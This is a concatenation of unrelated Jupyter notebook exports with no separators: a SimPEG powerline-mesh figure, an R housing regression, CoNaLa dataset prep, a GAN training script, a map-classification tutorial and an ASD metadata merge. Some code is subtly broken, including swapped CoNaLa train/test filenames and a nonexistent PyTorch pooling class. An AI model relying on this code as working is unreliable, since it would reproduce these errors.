[reduce_lr, reduce_lr_plateau, early_stop]) scores = model.evaluate(np.array(val_data), np.array(m), batch_size=batch_size) print("Loss: " + str(scores[0])) print("Accuracy: " + str(scores[1]))Powerline discretizationFigure 7 of the Kang et al. (2020) is generated using this notebook.from SimPEG import Mesh, Utils import numpy as np from simpegEM1D import diffusion_distance from pymatsolver import Pardiso from SimPEG import EM from scipy.constants import mu_0 from scipy.interpolate import interp1d from simpegEM1D.Waveforms import piecewise_pulse_fast from pyMKL import mkl_set_num_threads from simpegskytem.TDEM import ProblemSkyTEM from mesh_utils import refineTree, meshBuilder num_threads = 4 mkl_set_num_threads(num_threads) tmin, tmax = 1e-6, 1e-2 sigma_for_padding = 1./100. padding_distance = np.round(diffusion_distance(1e-2, sigma_for_padding) * 2) sigma_halfspace = 1./20. layer_thickness = 4 resistivity_near = 100. x = np.linspace(-250, 250) y = np.linspace(-250, 250) z = np.array([0.]) dem = Utils.ndgrid(x,y,z) result_dir = "./n_tower/" maxLevel = 11 h = [1, 1, 1] octreeLevel = [0, 1, 1, 1, 4, 4, 10] # n_towers = [2, 4, 6, 8, 10, 12, 14] ground_resistance = 20. n_tower = 2 padDist = np.ones((3, 2)) * padding_distance mesh = meshBuilder( dem, h, padDist, meshType='TREE', verticalAlignment='center' ) # Refine the mesh around topographyttb mesh = refineTree( mesh, dem, dtype='surface', octreeLevels=octreeLevel, finalize=False ) y = np.linspace(-40, 40) x = np.linspace(-10, 10) z = np.array([0.]) tmp = Utils.ndgrid(x,y,z) # Refine the mesh around topography mesh = refineTree(mesh, tmp, dtype='surface', octreeLevels=[0, 0, 0, 0, 0, 1], finalize=False) n_segment = int(n_tower) l_copper = 80. ys = np.arange(n_segment) * l_copper shift = -ys.max()/2. ys += shift x1 = 0. # z1, z2 = -h[0]*2., 10. z1, z2 = -3., 10. # z1, z2 = 0., 10. ys_corr = [] for y_temp in ys: ys_corr.append(mesh.vectorNy[np.argmin(abs(mesh.vectorNy-y_temp))]) ys = np.hstack(ys_corr) x1 = mesh.vectorNx[np.argmin(abs(mesh.vectorNx-x1))] z1 = mesh.vectorNz[np.argmin(abs(mesh.vectorNz-z1))] z2 = mesh.vectorNz[np.argmin(abs(mesh.vectorNz-z2))] pts_top = [] pts_bottom = [] for ii in range(n_segment-1): ind_y_top = np.logical_and(mesh.vectorNy>=ys[ii], mesh.vectorNy<=ys[ii+1]) ex = np.ones(ind_y_top.sum()) * x1 ez = np.ones(ind_y_top.sum()) * z2 pts_top.append(np.c_[ex, mesh.vectorNy[ind_y_top], ez]) ez = np.ones(ind_y_top.sum()) * z1 pts_bottom.append(np.c_[ex, mesh.vectorNy[ind_y_top], ez]) pts_tower = [] for ii in range(n_segment): ind_z_side = np.logical_and(mesh.vectorNz>=z1, mesh.vectorNz<=z2) ex = np.ones(ind_z_side.sum())*x1 ey = np.ones(ind_z_side.sum())*ys[ii] pts_tower.append(np.c_[ex, ey, mesh.vectorNz[ind_z_side]]) # pts = np.vstack((np.vstack(pts_top), np.vstack(pts_bottom), np.vstack(pts_tower))) pts = np.vstack((np.vstack(pts_top), np.vstack(pts_tower))) mesh = refineTree(mesh, pts, dtype='point', octreeLevels=[1, 0, 0], finalize=False) survey_length = 400. dx = 4 n_src = survey_length / dx x = np.arange(n_src) * dx x -= x.max()/2. y = np.array([abs(mesh.vectorCCy).min()]) z_src = 40. z = np.array([z_src]) xyz = Utils.ndgrid(x, y, z) mesh = refineTree(mesh, xyz, dtype='point', octreeLevels=[1, 0, 0], finalize=True, maxLevel=maxLevel) sigma = np.ones(mesh.nC) * 1./20 inds_air = mesh.gridCC[:, 2] > 0. sigma[mesh.gridCC[:, 2] > 0.] = 1e-8 indArr, levels = mesh.__getstate__() inds = levels == levels.max() temp = np.unique(levels) cell_size = 2**(temp.max()-temp) print (n_tower) radius_copper = 3.264 * 1e-3/2. 
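# Editor's note (interpretation of the conductivity assignments below, not from the
# original notebook): the copper wire and ground rods are not meshed at their true radii;
# each conductor is instead smeared over the finest octree cells by scaling its material
# conductivity with the ratio of its physical cross-section to the cell cross-section,
# i.e. sigma_cell = sigma_material * area_material / area_cell with
# area_cell = (mesh.hx.min() * 4)**2, which preserves the conductance along the conductor.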
area_copper = np.pi * radius_copper **2 radius_rod = 15.87 * 1e-3 / 2. area_rod = np.pi * radius_rod **2 sigma_copper = 6e7 sigma_rod = 1e8 area = (mesh.hx.min() * 4)**2 sigma[np.logical_and(inds, inds_air)] = sigma_copper * area_copper / area inds_layer_near = ( (np.logical_and(mesh.gridCC[:,2]<0., mesh.gridCC[:,2]>-layer_thickness)) & (np.logical_and(mesh.gridCC[:,0]>-4, mesh.gridCC[:,0]<4)) & (np.logical_and(mesh.gridCC[:,1]>-43, mesh.gridCC[:,1]<43)) ) sigma[inds_layer_near] = 1./resistivity_near inds_layer = np.logical_and(mesh.gridCC[:,2]<0., mesh.gridCC[:,2]>-3) sigma[np.logical_and(inds, ~inds_air) & (inds_layer)] = sigma_rod * area_rod / area import matplotlib.pyplot as plt from matplotlib.colors import LogNorm from mpl_toolkits.axes_grid1 import make_axes_locatable import matplotlib matplotlib.rcParams['font.size'] = 14 import matplotlib as mpl from pylab import cm def discrete_cmap(N=4): """create a colormap with N (N<15) discrete colors and register it""" # define individual colors as hex values # cpool = ['#00FFFF', '#3CB371','#DAA520','#DC143C','#8A2BE2'] # cpool = ['white','green', 'orange', 'skyblue', 'red'] cpool = ['orange','green', 'skyblue', 'red', 'white'] cmap3 = mpl.colors.ListedColormap(cpool[0:N], 'indexed') cm.register_cmap(cmap=cmap3) return cmap3 geomap = discrete_cmap(N=5) ind_0 = sigma == np.unique(sigma)[0] ind_1 = sigma == np.unique(sigma)[1] ind_2 = sigma == np.unique(sigma)[2] ind_3 = sigma == np.unique(sigma)[3] ind_4 = sigma == np.unique(sigma)[4] pw_model = np.zeros_like(sigma) pw_model[ind_0] = 4 pw_model[ind_1] = 1 pw_model[ind_2] = 0 pw_model[ind_3] = 3 pw_model[ind_4] = 2 # sigma[mesh.gridCC[:,2]>0.] = np.nan fig, axs = plt.subplots(1,2, figsize=(10, 5)) clim = -0.5, 4.5 out = mesh.plotSlice( pw_model, grid=True, normal='X', pcolorOpts={'cmap':geomap}, ax=axs[0], clim=clim ) axs[0].set_xlim(-50, 50) axs[0].set_ylim(-50, 50) axs[0].set_aspect(1) axs[0].set_xlabel('y (m)') axs[0].set_ylabel('z (m)') axs[0].set_title(('(a) x=0.5m')) # axs[0].plot(xyz[:,1], xyz[:,2], 'k.') out = mesh.plotSlice( pw_model, grid=True, normal='Y', pcolorOpts={'cmap':geomap}, ax=axs[1], clim=clim ) axs[1].set_xlim(-50, 50) axs[1].set_ylim(-50, 50) axs[1].set_aspect(1) axs[1].set_xlabel('x (m)') axs[1].set_ylabel(' ') axs[1].set_title(('(b) y=0.5m')) # axs[1].plot(xyz[:,0], xyz[:,2], 'k.') cbaxes = fig.add_axes([1, 0.2, 0.02, 0.6]) cb = plt.colorbar( out[0], cax=cbaxes, orientation='vertical', ticks=[0, 1, 2, 3, 4], ) # cb.set_ticklabels(["Air", "Near-surface", "Background", "Ground electrode", "Copper wire"]) cb.set_ticklabels(["Background", "Ground pathway", "Ground electrode", "Copper wire", "Air"]) plt.tight_layout() fig.savefig("./figures/figure-7", dpi=200) # mesh.writeUBC('mesh.msh', models={'sigma.con':sigma})Boston Housing load data# load data dataset = read.csv('Boston_Housing.csv') dataset <- dataset[ -c(1) ] # drop the first column (index) # import library #install.packages('MLmetrics') library(caTools) library(MLmetrics) # to calculate cost function for modelsSplit datasetset.seed(2) # split data with ratio 75/25 split = sample.split(dataset$target, SplitRatio = 0.75) training_set = subset(dataset, split == TRUE) # Set True for train set test_set = subset(dataset, split == FALSE) # Set false for Test set head(training_set)Create linear model using all features# create regressor using all features regressor = lm(formula = target ~ ., data = training_set) # show the summary and coefficients for regressor cat("--------------------------------------------------\n") 
summary(regressor) cat("--------------------------------------------------\n") regressor$coefficients # use model to predict the y_test y_pred <- predict(regressor, newdata = test_set) y_actual <- test_set$target cat("--------------------------------------------------\n") cat("Linear Regression model using all features \nThe results for MAE: ",MAE(y_actual, y_pred), "\nThe results for MSE: ",MSE(y_actual, y_pred),"\n")--------------------------------------------------Create linear model using the most affected featuresregressor2 = lm(formula = target ~ ZN + RM +DIS ,data = training_set) # show the summary and coefficients for regressor cat("--------------------------------------------------\n") summary(regressor2) cat("--------------------------------------------------\n") regressor2$coefficients # use model to predict the y_test y_pred_2 <- predict(regressor2, newdata = test_set) cat("--------------------------------------------------\n") cat("Linear Regression model using the most affected features\nThe results for MAE: " ,MAE(y_actual, y_pred_2), "\nThe results for MSE: ",MSE(y_actual, y_pred_2),"\n")--------------------------------------------------© 2020 NokiaLicensed under the BSD 3 Clause licenseSPDX-License-Identifier: BSD-3-Clause Prepare Conala snippet collection and evaluation datafrom pathlib import Path import json from collections import defaultdict from codesearch.data import load_jsonl, save_jsonl corpus_url = "http://www.phontron.com/download/conala-corpus-v1.1.zip" conala_dir = Path("conala-corpus") conala_train_fn = conala_dir/"conala-test.json" conala_test_fn = conala_dir/"conala-train.json" conala_mined_fn = conala_dir/"conala-mined.jsonl" conala_snippets_fn = "conala-curated-snippets.jsonl" conala_retrieval_test_fn = "conala-test-curated-0.5.jsonl" if not conala_train_fn.exists(): !wget $corpus_url !unzip conala-corpus-v1.1.zip conala_mined = load_jsonl(conala_mined_fn)The mined dataset seems to noisy to incorporate in the snippet collection:!sed -n '10000,10009p;10010q' $conala_mined_fn with open(conala_train_fn) as f: conala_train = json.load(f) with open(conala_test_fn) as f: conala_test = json.load(f) conala_all = conala_train + conala_test conala_all[:2], len(conala_all), len(conala_train), len(conala_test) for s in conala_all: if s["rewritten_intent"] == "Convert the first row of numpy matrix `a` to a list": print(s) question_ids = {r["question_id"] for r in conala_all} intents = set(r["intent"] for r in conala_all) len(question_ids), len(conala_all), len(intents) id2snippet = defaultdict(list) for r in conala_all: id2snippet[r["question_id"]].append(r) for r in conala_all: if not r["intent"]: print(r) if r["intent"].lower() == (r["rewritten_intent"] or "").lower(): print(r) import random random.seed(42) snippets = [] eval_records = [] for question_id in id2snippet: snippets_ = [r for r in id2snippet[question_id] if r["rewritten_intent"]] if not snippets_: continue for i, record in enumerate(snippets_): snippet_record = { "id": f'{record["question_id"]}-{i}', "code": record["snippet"], "description": record["rewritten_intent"], "language": "python", "attribution": f"https://stackoverflow.com/questions/{record['question_id']}" } snippets.append(snippet_record) # occasionally snippets from the same question have a slightly different intent # to avoid similar queries, we create only one query per question query = random.choice(snippets_)["intent"] if any(query.lower() == r["description"].lower() for r in snippets[-len(snippets_):] ): print(f"filtering query 
{query}") continue relevant_ids = [r["id"] for r in snippets[-len(snippets_):] ] eval_records.append({"query": query, "relevant_ids": relevant_ids}) snippets[:2], len(snippets), eval_records[:2], len(eval_records) id2snippet_ = {r["id"]: r for r in snippets} for i, eval_record in enumerate(eval_records): print(f"Query: {eval_record['query']}") print(f"Relevant descriptions: {[id2snippet_[id]['description'] for id in eval_record['relevant_ids']]}") if i == 10: break from codesearch.text_preprocessing import compute_overlap compute_overlap("this is a test", "test test") overlaps = [] filtered_eval_records = [] for r in eval_records: query = r["query"] descriptions = [id2snippet_[id]['description'] for id in r['relevant_ids']] overlap = max(compute_overlap(query, d)[1] for d in descriptions) overlaps.append(overlap) if overlap < 0.5 : filtered_eval_records.append(r) filtered_eval_records[:2], len(filtered_eval_records) save_jsonl(conala_snippets_fn, snippets) save_jsonl(conala_retrieval_test_fn, filtered_eval_records)Light GAN 1024 Importimport os import cv2 as cv import numpy as np import torch import torch.nn as nn import torchvision from torch.autograd import Variable from torch.cuda.amp import autocast, GradScaler from torch.utils.data import Dataset, DataLoader from torchvision.utils import save_imageHyperparametersn_epochs = 100 # type=int, "number of epochs of training" batch_size = 10 # type=int, "size of the batches" lr = 0.0025 # type=float "adam: learning rate" b1 = 0.5 # type=float "adam: decay of first order momentum of gradient" b2 = 0.999 # type=float "adam: decay of first order momentum of gradient" num_gpu = 2 cuda = torch.cuda.is_available() latent_dim = 4 # type=int "dimensionality of the latent space" img_size = 1024 # type=int "size of each image dimension" channels = 1 # type=int "number of image channels" sample_interval = 10000 # int "interval betwen image samples" dataset_dir = r"C:\Users\Leo's PC\Documents\SSTP Tests\stylegan2-ada-pytorch\Font1024"Datasetsclass Dataset(Dataset): def __init__(self, file_dir, transform=None): self.dir = file_dir self.transform = transform self.diction = {} idx = 0 for filename in os.listdir(self.dir): if filename.endswith('png'): self.diction[idx] = filename idx += 1 def __len__(self): return len(self.diction) def __getitem__(self, idx): img_name = self.diction[idx] directory = self.dir + "\\" + str(img_name) image = cv.imread(directory, cv.IMREAD_GRAYSCALE) if self.transform: image = self.transform(image) return image dataset = Dataset(file_dir=dataset_dir)Dataloadersloader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True, drop_last=True)Model classesclass Generator(nn.Module): def __init__(self): super(Generator, self).__init__() #activation functions self.leackyrelu = nn.LeakyReLU(0.2) self.tanh = nn.Tanh() #upsampler self.upsamplerx4 = nn.Upsample(scale_factor=4) self.upsamplerx2 = nn.Upsample(scale_factor=2) self.pool = nn.AdaptiveMaxPool2d(output_size = 1024) #L1 self.conv1 = torch.nn.ConvTranspose2d(in_channels=512, out_channels=512, kernel_size=1, stride=1, padding=0, bias=True) self.norm1 = nn.BatchNorm2d(512) #L2 self.conv2 = torch.nn.ConvTranspose2d(in_channels=512, out_channels=256, kernel_size=5, stride=2, padding=2, bias=True) self.norm2 = nn.BatchNorm2d(256) #L3 self.conv3 = torch.nn.ConvTranspose2d(in_channels=256, out_channels=128, kernel_size=5, stride=2, padding=2, bias=True) self.norm3 = nn.BatchNorm2d(128) #L4 self.conv4 = torch.nn.ConvTranspose2d(in_channels=128, out_channels=64, kernel_size=5, 
stride=2, padding=2, bias=True) self.norm4 = nn.BatchNorm2d(64) #L5 self.conv5 = torch.nn.ConvTranspose2d(in_channels=64, out_channels=32, kernel_size=7, stride=2, padding=2, bias=True) self.norm5 = nn.BatchNorm2d(32) #L6 self.conv6 = torch.nn.ConvTranspose2d(in_channels=32, out_channels=channels, kernel_size=7, stride=2, padding=1, bias=True) self.norm6 = nn.BatchNorm2d(channels) @autocast() def forward(self, x): #L1 x = self.conv1(x) x = self.upsamplerx2(x) x = self.norm1(x) x = self.leackyrelu(x) #print(x.shape) #L2 x = self.conv2(x) x = self.upsamplerx2(x) x = self.norm2(x) x = self.leackyrelu(x) #print(x.shape) #L3 x = self.conv3(x) x = self.upsamplerx2(x) x = self.norm3(x) x = self.leackyrelu(x) #print(x.shape) #L4 x = self.conv4(x) x = self.norm4(x) x = self.leackyrelu(x) #print(x.shape) #L5 x = self.conv5(x) x = self.norm5(x) x = self.leackyrelu(x) #print(x.shape) #L6 x = self.conv6(x) #x = self.pool(x) x = self.norm6(x) x = self.tanh(x) return x def name(self): return "Generator" class Discriminator(nn.Module): def __init__(self): super(Discriminator, self).__init__() #activation functions self.leackyrelu = nn.LeakyReLU(0.2) self.sigmoid = nn.Sigmoid() self.softmax = nn.Softmax(dim=1) #L1 self.conv1 = nn.Conv2d(in_channels=channels, out_channels=32, kernel_size=3, stride=1, padding=1, bias=True) self.norm1 = nn.BatchNorm2d(32) self.pool1 = nn.AdaptiveMaxPool2d(output_size=512) #L2 self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1, bias=True) self.norm2 = nn.BatchNorm2d(64) self.pool2 = nn.AdaptiveMaxPool2d(output_size=256) #L3 self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, stride=1, padding=1, bias=True) self.norm3 = nn.BatchNorm2d(128) self.pool3 = nn.AdaptiveMaxPool2d(output_size=128) #L4 self.conv4 = torch.nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=1, padding=1, bias=True) self.norm4 = nn.BatchNorm2d(256) self.pool4 = nn.AdaptiveMaxPool2d(output_size=64) #L5 self.conv5 = nn.Conv2d(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding=1, bias=True) self.norm5 = nn.BatchNorm2d(512) self.pool5 = nn.AdaptiveMaxPool2d(output_size = 32) #L6 self.conv6 = nn.Conv2d(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding=1, bias=True) self.norm6 = nn.BatchNorm2d(1024) self.pool6 = nn.AdaptiveMaxPool2d(output_size=1) #L7 self.fc1 = nn.Linear(in_features=1024, out_features=512, bias=True) self.norm7 = nn.BatchNorm1d(512) self.dropout1 = nn.Dropout(p=0.5) #L8 self.fc2 = nn.Linear(in_features=512, out_features=2, bias=True) @autocast() def forward(self, x): #L1 x = self.conv1(x) x = self.norm1(x) x = self.leackyrelu(x) x = self.pool1(x) #print(x.shape) #L2 x = self.conv2(x) x = self.norm2(x) x = self.leackyrelu(x) x = self.pool2(x) #print(x.shape) #L3 x = self.conv3(x) x = self.norm3(x) x = self.leackyrelu(x) x = self.pool3(x) #print(x.shape) #L4 x = self.conv4(x) x = self.norm4(x) x = self.leackyrelu(x) x = self.pool4(x) #print(x.shape) #L5 x = self.conv5(x) x = self.norm5(x) x = self.leackyrelu(x) x = self.pool5(x) #print(x.shape) #L6 x = self.conv6(x) x = self.norm6(x) x = self.leackyrelu(x) x = self.pool6(x) x = x.view(x.shape[0], -1) #print(x.shape) #L7 x = self.fc1(x) x = self.norm7(x) x = self.dropout1(x) x = self.sigmoid(x) #print(x.shape) #L8 x = self.fc2(x) x = self.softmax(x) #print(x.shape) return x def name(self): return "Discriminator" class Discriminator_Res(nn.Module): def __init__(self): super(Discriminator_Res, self).__init__() self.prepool = 
nn.AdaptiveAveragePool2d(512, 512) self.ResNet = torchvision.models.resnet18(pretrained=True) self.ResNet.fc = nn.Linear(in_features=512, out_features=1, bias=True) @autocast() def forward(self, x): x = self.ResNet(x) return x def name(self): return "Discriminator_Res"Loss, Optimizer, Training setup# Loss function adversarial_loss = torch.nn.BCEWithLogitsLoss() # Initialize generator and discriminator G = Generator() D = Discriminator() def init_weights(m): if type(m) == nn.Linear or type(m) == nn.Conv2d or type(m) == nn.ConvTranspose2d: torch.nn.init.xavier_uniform_(m.weight) m.bias.data.fill_(0.01) G.apply(init_weights) D.apply(init_weights) device = torch.device("cuda:1" if torch.cuda.is_available() else "cpu") G.cuda() D.cuda() adversarial_loss.cuda() G = torch.nn.DataParallel(G) D = torch.nn.DataParallel(D) optimizer_G = torch.optim.Adam(G.parameters(), lr=lr, betas=(b1, b2)) optimizer_D = torch.optim.Adam(D.parameters(), lr=lr, betas=(b1, b2)) scaler = GradScaler() Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensorTrainingfor epoch in range(n_epochs): g_loss_avg = 0 d_loss_avg = 0 for idx, imgs in enumerate(loader): # Adversarial ground truths valid = Variable(Tensor(np.array([[1, 0] for i in range(imgs.shape[0])])), requires_grad=False).cuda() fake = Variable(Tensor(np.array([[0, 1] for i in range(imgs.shape[0])])), requires_grad=False).cuda() # Configure input real_imgs = Variable(imgs.type(Tensor)).cuda().to(device) # ----------------- # Train Generator # ----------------- optimizer_G.zero_grad() # Sample noise as generator input latent_vector = Variable(Tensor(np.random.randn(imgs.shape[0], 512, latent_dim, latent_dim))).cuda() G.train() D.eval() with autocast(): gen_imgs = G(latent_vector) # Generate a batch of images g_loss = adversarial_loss(D(gen_imgs), valid) # Loss measures generator's ability to fool the discriminator scaler.scale(g_loss).backward() #back propagation with calculated loss scaler.step(optimizer_G) scaler.update() g_loss_avg = g_loss.item() if idx==0 else g_loss_avg * 0.99 + g_loss.item() * 0.01 # --------------------- # Train Discriminator # --------------------- D.train() optimizer_D.zero_grad() real_imgs.unsqueeze_(1) with autocast(): # Measure discriminator's ability to classify real from generated samples real_loss = adversarial_loss(D(real_imgs), valid) fake_loss = adversarial_loss(D(gen_imgs.detach()), fake) d_loss = (real_loss + fake_loss) / 2 scaler.scale(d_loss).backward() #back propagation with calculated loss scaler.step(optimizer_D) scaler.update() batches_done = epoch * len(loader) + idx d_loss_avg = d_loss.item() if idx==0 else d_loss_avg * 0.99 + d_loss.item() * 0.01 save_image(gen_imgs.data[:25], r"C:/Users/Leo's PC/Documents/SSTP Tests/Chinese Characters/LightGAN out/%d.png" % batches_done, nrow=5, normalize=True) print("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]" % (epoch, n_epochs, idx, len(loader), d_loss_avg, g_loss_avg)) checkpoint_file = open(r"C:/Users/Leo's PC/Documents/SSTP Tests/Chinese Characters/LightGAN out/G.tar", 'wb') torch.save({'model': G.state_dict()}, checkpoint_file) checkpoint_file.close() ''' checkpoint = torch.load(open("C:/Users/Leo's PC/Documents/SSTP Tests/Chinese Characters/LightGAN out/G.tar", 'rb')) G.load_state_dict(checkpoint['model']) '''Breaking a variable to levels The scenario for this tutorial is that, you have a series of a variable, such as the population density of different cities. And, you need to classify them into different groups according to this variable, e.g. 
the very high, medium high, medium, medium low, and very low population density groups, etc. In some cases you already have a GeoDataFrame/DataFrame; in other cases you just have a list containing the numbers. So the following covers two major functions:
1. tm.leveling_vector, which takes a dataframe and a column name for the classification; and
2. bk.get_levels, which takes a list.
Both functions take a break_method for the breaking method, such as quantile (the default), head_tail_break, natural_break, equal_interval (and manual). They take a break_N parameter for specifying the number of groups. And they also take a break_cuts parameter. First, import the packages that are needed.
import geopandas as gpd # for reading and manipulating shapefiles import matplotlib.pyplot as plt # for making figures import seaborn as sns # for making distplots from colouringmap import theme_mapping as tm # a function named leveling_vector in tm will be used from colouringmap import breaking_levels as bk # a function named get_levels in bk will be used # magic line for matplotlib figures to be shown inline in jupyter cells %matplotlib inline
Read a demo file and take a look.
grid_res = gpd.read_file('data/community_results.shp') grid_res.head()
Take a look at the data distribution, using a seaborn distplot.
sns.distplot(grid_res['usercount'], kde=False)
The plot above shows that the data potentially follows an exponential distribution, so let's make the y scale logarithmic.
ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip')
Using the different break methods:
1. quantile
2. head_tail_break
3. natural_break
4. equal_interval
The following is the simplest way of converting a column of a gdf to levels.
level_list, cuts = tm.leveling_vector(grid_res, 'usercount') #, break_method='quantile') #default method is quantile
Normally, the level_list is assigned back to the gdf; this is what I did in the other mapping functions.
grid_res['user_level'] = level_list grid_res.head()
cuts contains the breaking values, with the min and max at both ends of the list.
cuts ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip') for c in cuts: ax.axvline(x=c) lev = list(set(level_list)) count = [ level_list.count(l) for l in lev ] print lev print count[0, 1, 2, 3, 4] [568, 585, 531, 550, 554]
Quantile gives a similar count for each level.
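As a quick cross-check (an editor's addition, not part of the original tutorial, and assuming the package's quantile method splits the data into equal-sized quintiles), the five-group cuts can also be computed directly with NumPy and compared with the cuts returned above.
import numpy as np # not imported earlier in this notebook
print(np.percentile(grid_res['usercount'], [0, 20, 40, 60, 80, 100]))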
Lets try some other break method.level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break') print cuts ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip') for c in cuts: ax.axvline(x=c) lev = list(set(level_list)) count = [ level_list.count(l) for l in lev ] print lev print count level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='natural_break') print cuts ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip') for c in cuts: ax.axvline(x=c) lev = list(set(level_list)) count = [ level_list.count(l) for l in lev ] print lev print count level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='equal_interval') print cuts ax = sns.distplot(grid_res['usercount'], kde=False) #ax.set_xscale("log", nonposx='clip') ax.set_yscale("log", nonposy='clip') for c in cuts: ax.axvline(x=c) lev = list(set(level_list)) count = [ level_list.count(l) for l in lev ] print lev print count[0, 1, 2, 3, 4] [2713, 53, 12, 3, 7]specifying the number of level The number of level is set to the parameter break_N, which is default to 5.After setting the break_N to N, the number of cuts become N+1, because it contain both the largest and the smallest values.level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break', break_N=3) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break', break_N=5) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break', break_N=7) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='head_tail_break', break_N=9) print cuts[0.0, 111.01004304160689, 483.8207547169811, 1173.1554054054054, 2146.409090909091, 3247.6875, 3889.375, 4475.0, 4506.0, 4506.0]note that what head_tail_break do for increased number of levels. specifying cuts manually There are two ways of using the cuts. This will return a cut list, and a level_list that is in the same length and same sequence with the input vector. 1. using quantile as method, and the cuts are some float numbers betweent 0-1. 2. using manual as method, and the cuts are some user defined cuts. 
NOTE that the cut list has to include the minimum and maximum values.level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='quantile', break_cuts=[0.,.25,.5,.75,1.]) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='quantile', break_cuts=[0.,0.1,.5,.99,1.]) print cuts level_list, cuts = tm.leveling_vector(grid_res, 'usercount', break_method='manual', break_cuts=[0.0, 120, 490, 1200, 2200, 4506.0]) print cuts[0.0, 0.0, 120, 490, 1200, 2200, 4506.0]breaking a list instead of a column of a dataframe Let say you have a list, instead of a dataframe/geodataframe.a_list = grid_res['usercount'].tolist()And you want to get the break levels, another function is also provided (the function that is called by tm.leveling_vector).level_list, cuts = bk.get_levels(a_list, method='head_tail_break', N=5) print cuts len(level_list)==len(a_list)ASD Meta-Analysis This notebook contains the steps to process and merge the metadata files from all studies together for combines study analyses#Import dependencies from qiime2 import Visualization import os import qiime2 as q2 import pandas as pd import seaborn as sns import matplotlib as mpl import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D import numpy as np import scipy from collections import Counter from sklearn.decomposition import PCA from sklearn.manifold import TSNE %matplotlib inline import warnings warnings.filterwarnings('ignore')Load Metadataamgut = pd.read_csv("./American_gut_metadata.txt",sep='\t',index_col=0) berding = pd.read_csv("./meta-berding.txt",sep='\t',index_col=0) cao = pd.read_csv("./meta-cao.txt",sep='\t',index_col=0) chen = pd.read_csv("./meta-chen.txt",sep='\t',index_col=0) dan = pd.read_csv("./meta-dan.txt",sep='\t',index_col=0) david = pd.read_csv("./meta-david.txt",sep='\t',index_col=0) huang = pd.read_csv("./meta-huang.txt",sep='\t',index_col=0) fouquier = pd.read_csv("./meta-fouquier.txt",sep='\t',index_col=0) kang = pd.read_csv("./meta-kang.txt",sep='\t',index_col=0) kong = pd.read_csv("./meta-kong.txt",sep='\t',index_col=0) liu = pd.read_csv("./meta-liu.txt",sep='\t',index_col=0) son = pd.read_csv("./meta-son.txt",sep='\t',index_col=0) zou = pd.read_csv("./meta-zou.txt",sep='\t',index_col=0) zurita = pd.read_csv("./meta-zurita.txt",sep='\t',index_col=0) amgut = amgut.drop(amgut.loc[amgut["Sex"]=="LabControl test"].index) all_meta = [amgut, berding, cao, chen, dan, david, huang, fouquier, kang, kong, liu, son, zou, zurita] all_meta_merged = pd.concat(all_meta) all_meta_merged all_meta_merged['Age'] = pd.to_numeric(all_meta_merged['Age'], errors='coerce')Define processing functionsdef add_age(row): if row['Age'] < 5 : return 'Below 5 years' if row['Age'] >= 5 and row['Age'] <= 7: return '5-7 years' if row['Age'] > 7: return 'Above 7 years' if row['Age'] == "Unknown": return "NaN" if row['Age'] == "NaN": return "NaN" else : return 'NaN' def sequencing_depth_min(row): if row['Study'] == "American Gut" : return 6000 if row['Study'] == "Berding2020" : return 14300 if row['Study'] == "Cao2021": return 5837 if row['Study'] == "Chen2020": return 18417 if row['Study'] == "Dan2020": return 26868 if row['Study'] == "David2021": return 5559 if row['Study'] == "Huang2021": return 14075 if row['Study'] == "Fouquier2021": return 20428 if row['Study'] == "Kang2017": return 5636 if row['Study'] == "Kong2019": return 18116 if row['Study'] == "Liu2019": return 22613 if row['Study'] == "Son2015": return 49184 if row['Study'] == "Zou2020": return 28246 if row['Study'] == 
"Zurita2019": return 5802 else : return "NaN" def sequencing_depth_range(row): if row['Study'] == "American Gut" : return "< 6000" if row['Study'] == "Berding2020" : return "< 6000" if row['Study'] == "Cao2021": return "< 6000" if row['Study'] == "Chen2020": return "> 1400" if row['Study'] == "Dan2020": return "> 1400" if row['Study'] == "David2021": return "< 6000" if row['Study'] == "Huang2021": return "> 1400" if row['Study'] == "Fouquier2021": return "> 1400" if row['Study'] == "Kang2017": return "< 6000" if row['Study'] == "Kong2019": return "> 1400" if row['Study'] == "Liu2019": return "> 1400" if row['Study'] == "Son2015": return "> 1400" if row['Study'] == "Zou2020": return "> 1400" if row['Study'] == "Zurita2019": return "< 6000" else : return 'NaN' def control_type_add(row): if row['Study'] == "American Gut" : return "No Relationship" if row['Study'] == "Berding2020" : return "No Relationship" if row['Study'] == "Cao2021": return "No Relationship" if row['Study'] == "Chen2020": return "Related" if row['Study'] == "Dan2020": return "No Relationship" if row['Study'] == "David2021": return "Related" if row['Study'] == "Huang2021": return "No Relationship" if row['Study'] == "Fouquier2021": return "Related" if row['Study'] == "Kang2017": return "No Relationship" if row['Study'] == "Kong2019": return "Related" if row['Study'] == "Liu2019": return "No Relationship" if row['Study'] == "Son2015": return "Related" if row['Study'] == "Zou2020": return "No Relationship" if row['Study'] == "Zurita2019": return "No Relationship" else : return 'NA' def Berding_Sample_Size(row): if row['Study'] == "Berding2020" : return 52 else : return row['Sample_size'] def Berding_Country(row): if row['Study'] == "Berding2020" : return "USA" if 